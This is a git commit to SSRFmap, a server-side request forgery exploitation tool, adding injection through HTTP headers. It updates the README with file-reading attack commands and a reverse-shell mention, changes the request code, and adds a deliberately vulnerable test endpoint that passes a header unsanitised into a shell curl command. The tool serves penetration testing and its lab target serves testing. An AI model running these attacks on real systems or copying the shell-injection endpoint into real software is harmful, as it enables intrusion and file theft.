Injection in headers

pull/53/head
Swissky 2024-06-08 21:53:36 +02:00
parent 404e0a49aa
commit febd5df763
4 changed files with 50 additions and 5 deletions

View File

@ -108,6 +108,12 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
```
If you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name
```powershell
python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test
```
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
```powershell
@ -115,7 +121,7 @@ If you need to have a custom user-agent use the `--uagent`. Some targets will us
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
```
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
Some modules allow you to create a connect back, you have to specify `LHOST` and `LPORT`. Also SSRFmap can listen for the incoming reverse shell.
```powershell
# Triggering a reverse shell on a Redis
@ -148,6 +154,17 @@ A quick way to test the framework can be done with `data/example.py` SSRF servic
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
```
Launch the tests requests:
```ps1
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue
```
## Contribute

View File

@ -75,6 +75,15 @@ class Requester(object):
def do_request(self, param, value, timeout=3, stream=False):
try:
# Handle injection in the headers
# Copying data to avoid multiple variables edit
header_injected = self.headers.copy()
if param in self.headers:
header_injected[param] = value
print('inject in header')
print(header_injected)
if self.method == "POST":
# Copying data to avoid multiple variables edit
data_injected = self.data.copy()
@ -86,7 +95,7 @@ class Requester(object):
if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
headers=header_injected,
json=data_injected,
timeout=timeout,
stream=stream,
@ -99,7 +108,7 @@ class Requester(object):
if param == '': data_injected = value
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
headers=header_injected,
data=data_injected,
timeout=timeout,
stream=stream,
@ -116,7 +125,7 @@ class Requester(object):
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
headers=header_injected,
data=data_xml,
timeout=timeout,
stream=stream,
@ -137,7 +146,7 @@ class Requester(object):
data_injected = re.sub(regex, param+'='+value, self.action)
r = requests.get(
self.protocol + "://" + self.host + data_injected,
headers=self.headers,
headers=header_injected,
timeout=timeout,
stream=stream,
verify=False,

View File

@ -48,6 +48,15 @@ def ssrf4():
except Exception as e:
return e
# curl -v "http://127.0.0.1:5000/ssrf5" -H 'X-Custom-Header: http://example.com'
@app.route("/ssrf5", methods=['GET'])
def ssrf5():
data = request.headers.get('X-Custom-Header')
content = command(f"curl {data}")
return content
def command(cmd):
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()

10
examples/request6.txt Normal file
View File

@ -0,0 +1,10 @@
GET /ssrf5 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
X-Custom-Header: http://example.com
Connection: close
Upgrade-Insecure-Requests: 1